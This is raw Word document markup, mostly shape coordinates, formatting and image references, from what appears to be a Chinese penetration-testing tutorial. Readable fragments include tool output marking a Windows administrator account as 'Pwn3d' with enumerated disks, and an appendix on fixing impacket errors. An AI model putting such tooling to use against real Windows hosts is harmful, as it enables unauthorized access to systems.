,1855,4856,1860,4856,1865,4856,1870,4856,1875,4856,1881,4856,1886,4856,1891,4856,1897,4856,1903,4856,1908,4856,1914,4856,1920,4856,1926,4856,1932,4856,1939,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4856,1945,4855,1945,4855,1945,4855,1945,4855,1945,4855,1945,4855,1945,4855,1945,4854,1945,4854,1945,4854,1945,4854,1945,4853,1945,4853,1945,4853,1945,4853,1945,4852,1945,4852,1945,4852,1945,4851,1945,4851,1945,4850,1945,4850,1945,4850,1945,4849,1945,4849,1945,4848,1945,4848,1945,4847,1945,4846,1945,4846,1945,4845,1945,4845,1945,4844,1945,4843,1945,4843,1945,4842,1945,4841,1945,4840,1945,4839,1945,4839,1945,4838,1945,4837,1945,4836,1945,4835,1945,4834,1945,4833,1945,4832,1945,4831,1945,4830,1945,4829,1945,4828,1945,4826,1945,4825,1945,4824,1945,4823,1945,4821,1945,4820,1945,4819,1945,4817,1945,4816,1945,4814,1945,4813,1945,4811,1945,4810,1945,4808,1945,4806,1945,4805,1945,4803,1945,4801,1945,4799,1945,4797,1945,4795,1945,4793,1945,4791,1945,4789,1945,4787,1945,4785,1945,4783,1945,4781,1945,4779,1945,4776,1945,4774,1945,4772,1945,4769,1945,4767,1945,4764,1945,4762,1945,4759,1945,4756,1945,4754,1945,4751,1945,4748,1945,4745,1945,4742,1945,4739,1945,4736,1945,4736,1945,4736,1945,4736,1945,4736,1945,4736,1945,4736,1945,4736,1945,4736,1945,4736,1945,4736,1945,4736,1945,4736,1945,4736,1945,4736,1945,4736,1945,4736,1944,4736,1944,4736,1944,4736,1944,4736,1944,4736,1944,4736,1944,4736,1943,4736,1943,4736,1943,4736,1943,4736,1942,4736,1942,4736,1942,4736,1941,4736,1941,4736,1940,4736,1940,4736,1940,4736,1939,4736,1938,4736,1938,4736,1937,4736,1937,4736,1936,4736,1935,4736,1935,4736,1934,4736,1933,4736,1932,4736,1931,4736,1930,4736,1929,4736,1928,4736,1927,4736,1926,4736,1925,4736,1924,4736,1922,4736,1921,4736,1920,4736,1918,4736,1917,4736,1915,4736,1914,4736,1912,4736,1911,4736,1909,4736,1907,4736,1905,4736,1903,4736,1901,4736,1899,4736,1897,4736,1895,4736,1893,4736,1891,4736,1888,4736,1886,4736,1884,4736,1881,4736,1879,4736,1876,4736,1873,4736,1870,4736,1867,4736,1865,4736,1862,4736,1858,4736,1855,4736,1852,4736,1849,4736,1845,4736,1842,4736,1838,4736,1835,4736,1831,4736,1827,4736,1823,4736,1819,4736,1815,4736,1811,4736,1807,4736,1802,4736,1798,4736,1794,4736,1789,4736,1784,4736,1780,4736,1775,4736,1770,4736,1765,4736,1760,4736,1754,4736,1749,4736,1743,4736,1738,4736,1732,4736,1727,4736,1721,4736,1715,4736,1709,4736,1702,4736,1696,4736,1690e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:319.500pt;margin-top:83.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6390,1670" coordsize="130,270">
        <v:shape style="position:absolute;left:6390;top:1670;width:130;height:270" coordorigin="6390,1670" coordsize="130,270" path="m6417,1690l6417,1690,6417,1690,6417,1690,6417,1690,6417,1690,6417,1690,6417,1690,6417,1690,6417,1690,6417,1690,6417,1690,6417,1690,6417,1690,6417,1690,6417,1690,6417,1690,6418,1690,6418,1690,6418,1690,6418,1690,6418,1690,6418,1690,6418,1690,6418,1690,6418,1690,6418,1690,6418,1690,6419,1690,6419,1690,6419,1690,6419,1690,6419,1690,6420,1690,6420,1690,6420,1690,6420,1690,6421,1690,6421,1690,6421,1690,6421,1690,6422,1690,6422,1690,6423,1690,6423,1690,6423,1690,6424,1690,6424,1690,6425,1690,6425,1690,6426,1690,6426,1690,6427,1690,6427,1690,6428,1690,6428,1690,6429,1690,6430,1690,6430,1690,6431,1690,6432,1690,6433,1690,6433,1690,6434,1690,6435,1690,6436,1690,6437,1690,6438,1690,6439,1690,6440,1690,6441,1690,6442,1690,6443,1690,6444,1690,6445,1690,6446,1690,6447,1690,6449,1690,6450,1690,6451,1690,6452,1690,6454,1690,6455,1690,6457,1690,6458,1690,6459,1690,6461,1690,6463,1690,6464,1690,6466,1690,6467,1690,6469,1690,6471,1690,6473,1690,6475,1690,6476,1690,6478,1690,6480,1690,6482,1690,6484,1690,6486,1690,6488,1690,6491,1690,6493,1690,6495,1690,6497,1690,6500,1690,6502,1690,6505,1690,6507,1690,6509,1690,6512,1690,6515,1690,6517,1690,6520,1690,6523,1690,6526,1690,6528,1690,6531,1690,6534,1690,6537,1690,6537,1690,6537,1690,6537,1690,6537,1690,6537,1690,6537,1690,6537,1690,6537,1690,6537,1690,6537,1690,6537,1690,6537,1690,6537,1690,6537,1690,6537,1690,6537,1690,6537,1690,6537,1691,6537,1691,6537,1691,6537,1691,6537,1691,6537,1691,6537,1692,6537,1692,6537,1692,6537,1693,6537,1693,6537,1693,6537,1694,6537,1694,6537,1694,6537,1695,6537,1695,6537,1696,6537,1696,6537,1697,6537,1698,6537,1698,6537,1699,6537,1700,6537,1700,6537,1701,6537,1702,6537,1703,6537,1704,6537,1705,6537,1706,6537,1707,6537,1708,6537,1709,6537,1710,6537,1711,6537,1712,6537,1714,6537,1715,6537,1716,6537,1718,6537,1719,6537,1721,6537,1723,6537,1724,6537,1726,6537,1728,6537,1730,6537,1731,6537,1733,6537,1735,6537,1737,6537,1740,6537,1742,6537,1744,6537,1746,6537,1749,6537,1751,6537,1754,6537,1756,6537,1759,6537,1762,6537,1764,6537,1767,6537,1770,6537,1773,6537,1776,6537,1780,6537,1783,6537,1786,6537,1790,6537,1793,6537,1797,6537,1800,6537,1804,6537,1808,6537,1812,6537,1816,6537,1820,6537,1824,6537,1828,6537,1832,6537,1837,6537,1841,6537,1846,6537,1851,6537,1855,6537,1860,6537,1865,6537,1870,6537,1875,6537,1881,6537,1886,6537,1891,6537,1897,6537,1903,6537,1908,6537,1914,6537,1920,6537,1926,6537,1932,6537,1939,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6537,1945,6536,1945,6536,1945,6536,1945,6536,1945,6536,1945,6536,1945,6536,1945,6535,1945,6535,1945,6535,1945,6535,1945,6534,1945,6534,1945,6534,1945,6534,1945,6533,1945,6533,1945,6533,1945,6532,1945,6532,1945,6532,1945,6531,1945,6531,1945,6530,1945,6530,1945,6529,1945,6529,1945,6528,1945,6528,1945,6527,1945,6527,1945,6526,1945,6525,1945,6525,1945,6524,1945,6523,1945,6523,1945,6522,1945,6521,1945,6520,1945,6519,1945,6519,1945,6518,1945,6517,1945,6516,1945,6515,1945,6514,1945,6513,1945,6512,1945,6511,1945,6510,1945,6508,1945,6507,1945,6506,1945,6505,1945,6503,1945,6502,1945,6501,1945,6499,1945,6498,1945,6497,1945,6495,1945,6494,1945,6492,1945,6490,1945,6489,1945,6487,1945,6485,1945,6484,1945,6482,1945,6480,1945,6478,1945,6476,1945,6474,1945,6472,1945,6470,1945,6468,1945,6466,1945,6464,1945,6462,1945,6459,1945,6457,1945,6455,1945,6452,1945,6450,1945,6448,1945,6445,1945,6442,1945,6440,1945,6437,1945,6434,1945,6432,1945,6429,1945,6426,1945,6423,1945,6420,1945,6417,1945,6417,1945,6417,1945,6417,1945,6417,1945,6417,1945,6417,1945,6417,1945,6417,1945,6417,1945,6417,1945,6417,1945,6417,1945,6417,1945,6417,1945,6417,1945,6417,1944,6417,1944,6417,1944,6417,1944,6417,1944,6417,1944,6417,1944,6417,1943,6417,1943,6417,1943,6417,1943,6417,1942,6417,1942,6417,1942,6417,1941,6417,1941,6417,1940,6417,1940,6417,1940,6417,1939,6417,1938,6417,1938,6417,1937,6417,1937,6417,1936,6417,1935,6417,1935,6417,1934,6417,1933,6417,1932,6417,1931,6417,1930,6417,1929,6417,1928,6417,1927,6417,1926,6417,1925,6417,1924,6417,1922,6417,1921,6417,1920,6417,1918,6417,1917,6417,1915,6417,1914,6417,1912,6417,1911,6417,1909,6417,1907,6417,1905,6417,1903,6417,1901,6417,1899,6417,1897,6417,1895,6417,1893,6417,1891,6417,1888,6417,1886,6417,1884,6417,1881,6417,1879,6417,1876,6417,1873,6417,1870,6417,1867,6417,1865,6417,1862,6417,1858,6417,1855,6417,1852,6417,1849,6417,1845,6417,1842,6417,1838,6417,1835,6417,1831,6417,1827,6417,1823,6417,1819,6417,1815,6417,1811,6417,1807,6417,1802,6417,1798,6417,1794,6417,1789,6417,1784,6417,1780,6417,1775,6417,1770,6417,1765,6417,1760,6417,1754,6417,1749,6417,1743,6417,1738,6417,1732,6417,1727,6417,1721,6417,1715,6417,1709,6417,1702,6417,1696,6417,1690e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:101.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,2030" coordsize="130,270">
        <v:shape style="position:absolute;left:4710;top:2030;width:130;height:270" coordorigin="4710,2030" coordsize="130,270" path="m4736,2050l4736,2050,4736,2050,4736,2050,4736,2050,4736,2050,4736,2050,4736,2050,4736,2050,4736,2050,4736,2050,4736,2050,4736,2050,4737,2050,4737,2050,4737,2050,4737,2050,4737,2050,4737,2050,4737,2050,4737,2050,4737,2050,4737,2050,4737,2050,4737,2050,4737,2050,4737,2050,4738,2050,4738,2050,4738,2050,4738,2050,4738,2050,4739,2050,4739,2050,4739,2050,4739,2050,4739,2050,4740,2050,4740,2050,4740,2050,4741,2050,4741,2050,4741,2050,4742,2050,4742,2050,4742,2050,4743,2050,4743,2050,4744,2050,4744,2050,4745,2050,4745,2050,4746,2050,4746,2050,4747,2050,4748,2050,4748,2050,4749,2050,4750,2050,4750,2050,4751,2050,4752,2050,4753,2050,4753,2050,4754,2050,4755,2050,4756,2050,4757,2050,4758,2050,4759,2050,4760,2050,4761,2050,4762,2050,4763,2050,4764,2050,4765,2050,4766,2050,4768,2050,4769,2050,4770,2050,4772,2050,4773,2050,4774,2050,4776,2050,4777,2050,4779,2050,4780,2050,4782,2050,4783,2050,4785,2050,4787,2050,4788,2050,4790,2050,4792,2050,4794,2050,4796,2050,4797,2050,4799,2050,4801,2050,4803,2050,4806,2050,4808,2050,4810,2050,4812,2050,4814,2050,4817,2050,4819,2050,4821,2050,4824,2050,4826,2050,4829,2050,4831,2050,4834,2050,4836,2050,4839,2050,4842,2050,4845,2050,4848,2050,4850,2050,4853,2050,4856,2050,4856,2050,4856,2050,4856,2050,4856,2050,4856,2050,4856,2050,4856,2050,4856,2050,4856,2050,4856,2050,4856,2050,4856,2050,4856,2050,4856,2050,4856,2050,4856,2051,4856,2051,4856,2051,4856,2051,4856,2051,4856,2051,4856,2051,4856,2052,4856,2052,4856,2052,4856,2052,4856,2053,4856,2053,4856,2053,4856,2054,4856,2054,4856,2055,4856,2055,4856,2055,4856,2056,4856,2057,4856,2057,4856,2058,4856,2058,4856,2059,4856,2060,4856,2060,4856,2061,4856,2062,4856,2063,4856,2064,4856,2065,4856,2066,4856,2067,4856,2068,4856,2069,4856,2070,4856,2071,4856,2073,4856,2074,4856,2075,4856,2077,4856,2078,4856,2080,4856,2081,4856,2083,4856,2084,4856,2086,4856,2088,4856,2090,4856,2092,4856,2094,4856,2096,4856,2098,4856,2100,4856,2102,4856,2104,4856,2107,4856,2109,4856,2111,4856,2114,4856,2116,4856,2119,4856,2122,4856,2125,4856,2128,4856,2130,4856,2134,4856,2137,4856,2140,4856,2143,4856,2146,4856,2150,4856,2153,4856,2157,4856,2160,4856,2164,4856,2168,4856,2172,4856,2176,4856,2180,4856,2184,4856,2188,4856,2193,4856,2197,4856,2201,4856,2206,4856,2211,4856,2215,4856,2220,4856,2225,4856,2230,4856,2236,4856,2241,4856,2246,4856,2252,4856,2257,4856,2263,4856,2268,4856,2274,4856,2280,4856,2286,4856,2293,4856,2299,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4855,2305,4855,2305,4855,2305,4855,2305,4855,2305,4855,2305,4855,2305,4854,2305,4854,2305,4854,2305,4854,2305,4853,2305,4853,2305,4853,2305,4853,2305,4852,2305,4852,2305,4852,2305,4851,2305,4851,2305,4850,2305,4850,2305,4850,2305,4849,2305,4849,2305,4848,2305,4848,2305,4847,2305,4846,2305,4846,2305,4845,2305,4845,2305,4844,2305,4843,2305,4843,2305,4842,2305,4841,2305,4840,2305,4839,2305,4839,2305,4838,2305,4837,2305,4836,2305,4835,2305,4834,2305,4833,2305,4832,2305,4831,2305,4830,2305,4829,2305,4828,2305,4826,2305,4825,2305,4824,2305,4823,2305,4821,2305,4820,2305,4819,2305,4817,2305,4816,2305,4814,2305,4813,2305,4811,2305,4810,2305,4808,2305,4806,2305,4805,2305,4803,2305,4801,2305,4799,2305,4797,2305,4795,2305,4793,2305,4791,2305,4789,2305,4787,2305,4785,2305,4783,2305,4781,2305,4779,2305,4776,2305,4774,2305,4772,2305,4769,2305,4767,2305,4764,2305,4762,2305,4759,2305,4756,2305,4754,2305,4751,2305,4748,2305,4745,2305,4742,2305,4739,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2304,4736,2304,4736,2304,4736,2304,4736,2304,4736,2304,4736,2303,4736,2303,4736,2303,4736,2302,4736,2302,4736,2302,4736,2301,4736,2301,4736,2301,4736,2300,4736,2300,4736,2299,4736,2299,4736,2298,4736,2297,4736,2297,4736,2296,4736,2295,4736,2295,4736,2294,4736,2293,4736,2292,4736,2291,4736,2290,4736,2289,4736,2288,4736,2287,4736,2286,4736,2285,4736,2284,4736,2283,4736,2281,4736,2280,4736,2279,4736,2277,4736,2276,4736,2274,4736,2272,4736,2271,4736,2269,4736,2267,4736,2265,4736,2264,4736,2262,4736,2260,4736,2258,4736,2255,4736,2253,4736,2251,4736,2249,4736,2246,4736,2244,4736,2241,4736,2239,4736,2236,4736,2233,4736,2231,4736,2228,4736,2225,4736,2222,4736,2219,4736,2215,4736,2212,4736,2209,4736,2205,4736,2202,4736,2198,4736,2195,4736,2191,4736,2187,4736,2183,4736,2179,4736,2175,4736,2171,4736,2167,4736,2163,4736,2158,4736,2154,4736,2149,4736,2144,4736,2140,4736,2135,4736,2130,4736,2125,4736,2120,4736,2114,4736,2109,4736,2104,4736,2098,4736,2092,4736,2087,4736,2081,4736,2075,4736,2069,4736,2063,4736,2056,4736,2050e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:120.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,2410" coordsize="130,270">
        <v:shape style="position:absolute;left:4710;top:2410;width:130;height:270" coordorigin="4710,2410" coordsize="130,270" path="m4736,2425l4736,2425,4736,2425,4736,2425,4736,2425,4736,2425,4736,2425,4736,2425,4736,2425,4736,2425,4736,2425,4736,2425,4736,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4738,2425,4738,2425,4738,2425,4738,2425,4738,2425,4739,2425,4739,2425,4739,2425,4739,2425,4739,2425,4740,2425,4740,2425,4740,2425,4741,2425,4741,2425,4741,2425,4742,2425,4742,2425,4742,2425,4743,2425,4743,2425,4744,2425,4744,2425,4745,2425,4745,2425,4746,2425,4746,2425,4747,2425,4748,2425,4748,2425,4749,2425,4750,2425,4750,2425,4751,2425,4752,2425,4753,2425,4753,2425,4754,2425,4755,2425,4756,2425,4757,2425,4758,2425,4759,2425,4760,2425,4761,2425,4762,2425,4763,2425,4764,2425,4765,2425,4766,2425,4768,2425,4769,2425,4770,2425,4772,2425,4773,2425,4774,2425,4776,2425,4777,2425,4779,2425,4780,2425,4782,2425,4783,2425,4785,2425,4787,2425,4788,2425,4790,2425,4792,2425,4794,2425,4796,2425,4797,2425,4799,2425,4801,2425,4803,2425,4806,2425,4808,2425,4810,2425,4812,2425,4814,2425,4817,2425,4819,2425,4821,2425,4824,2425,4826,2425,4829,2425,4831,2425,4834,2425,4836,2425,4839,2425,4842,2425,4845,2425,4848,2425,4850,2425,4853,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2426,4856,2426,4856,2426,4856,2426,4856,2426,4856,2426,4856,2426,4856,2426,4856,2427,4856,2427,4856,2427,4856,2427,4856,2428,4856,2428,4856,2428,4856,2429,4856,2429,4856,2429,4856,2430,4856,2430,4856,2431,4856,2431,4856,2432,4856,2432,4856,2433,4856,2434,4856,2434,4856,2435,4856,2436,4856,2436,4856,2437,4856,2438,4856,2439,4856,2440,4856,2441,4856,2442,4856,2443,4856,2444,4856,2445,4856,2447,4856,2448,4856,2449,4856,2450,4856,2452,4856,2453,4856,2455,4856,2456,4856,2458,4856,2460,4856,2461,4856,2463,4856,2465,4856,2467,4856,2469,4856,2471,4856,2473,4856,2475,4856,2477,4856,2479,4856,2482,4856,2484,4856,2487,4856,2489,4856,2492,4856,2494,4856,2497,4856,2500,4856,2503,4856,2506,4856,2509,4856,2512,4856,2515,4856,2518,4856,2522,4856,2525,4856,2528,4856,2532,4856,2536,4856,2539,4856,2543,4856,2547,4856,2551,4856,2555,4856,2559,4856,2563,4856,2568,4856,2572,4856,2577,4856,2581,4856,2586,4856,2591,4856,2596,4856,2600,4856,2606,4856,2611,4856,2616,4856,2621,4856,2627,4856,2632,4856,2638,4856,2644,4856,2650,4856,2655,4856,2662,4856,2668,4856,2674,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4855,2680,4855,2680,4855,2680,4855,2680,4855,2680,4855,2680,4855,2680,4854,2680,4854,2680,4854,2680,4854,2680,4853,2680,4853,2680,4853,2680,4853,2680,4852,2680,4852,2680,4852,2680,4851,2680,4851,2680,4850,2680,4850,2680,4850,2680,4849,2680,4849,2680,4848,2680,4848,2680,4847,2680,4846,2680,4846,2680,4845,2680,4845,2680,4844,2680,4843,2680,4843,2680,4842,2680,4841,2680,4840,2680,4839,2680,4839,2680,4838,2680,4837,2680,4836,2680,4835,2680,4834,2680,4833,2680,4832,2680,4831,2680,4830,2680,4829,2680,4828,2680,4826,2680,4825,2680,4824,2680,4823,2680,4821,2680,4820,2680,4819,2680,4817,2680,4816,2680,4814,2680,4813,2680,4811,2680,4810,2680,4808,2680,4806,2680,4805,2680,4803,2680,4801,2680,4799,2680,4797,2680,4795,2680,4793,2680,4791,2680,4789,2680,4787,2680,4785,2680,4783,2680,4781,2680,4779,2680,4776,2680,4774,2680,4772,2680,4769,2680,4767,2680,4764,2680,4762,2680,4759,2680,4756,2680,4754,2680,4751,2680,4748,2680,4745,2680,4742,2680,4739,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2679,4736,2679,4736,2679,4736,2679,4736,2679,4736,2679,4736,2678,4736,2678,4736,2678,4736,2677,4736,2677,4736,2677,4736,2676,4736,2676,4736,2675,4736,2675,4736,2674,4736,2674,4736,2673,4736,2673,4736,2672,4736,2671,4736,2671,4736,2670,4736,2669,4736,2668,4736,2667,4736,2667,4736,2666,4736,2665,4736,2664,4736,2663,4736,2661,4736,2660,4736,2659,4736,2658,4736,2657,4736,2655,4736,2654,4736,2652,4736,2651,4736,2649,4736,2648,4736,2646,4736,2644,4736,2642,4736,2641,4736,2639,4736,2637,4736,2635,4736,2633,4736,2631,4736,2628,4736,2626,4736,2624,4736,2621,4736,2619,4736,2616,4736,2614,4736,2611,4736,2609,4736,2606,4736,2603,4736,2600,4736,2597,4736,2594,4736,2591,4736,2587,4736,2584,4736,2581,4736,2577,4736,2574,4736,2570,4736,2566,4736,2562,4736,2559,4736,2555,4736,2551,4736,2546,4736,2542,4736,2538,4736,2533,4736,2529,4736,2524,4736,2520,4736,2515,4736,2510,4736,2505,4736,2500,4736,2495,4736,2490,4736,2484,4736,2479,4736,2473,4736,2468,4736,2462,4736,2456,4736,2450,4736,2444,4736,2438,4736,2432,4736,2425e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:239.400pt;width:467.400pt;height:189.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId41" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:489.600pt;width:297.600pt;height:97.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId42" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:668.400pt;width:249.600pt;height:37.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId43" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:454.200pt;margin-top:755.400pt;width:7.200pt;height:6.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId4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455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BMI9HGC42S\administrator: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Pwn3d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Enumerated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disks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C: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D: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BMI9HGC42S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E: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附录：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2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>解决出现：STATUS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_PIPE_DISCONNECTED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改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>成经典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解决出现错误：UnicodeDecod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eError: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升级imp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acket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jpeg" />
	<Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/32.jpeg" />
	<Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/33.jpeg" />
	<Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/34.jpeg" />
	<Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/35.jpeg" />
	<Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/36.jpeg" />
	<Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/37.jpeg" />
	<Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/38.jpeg" />
	<Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/39.jpeg" />
	<Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/40.jpeg" />
	<Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/41.jpeg" />
	<Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/42.jpeg" />
	<Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/43.jpeg" />
	<Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/44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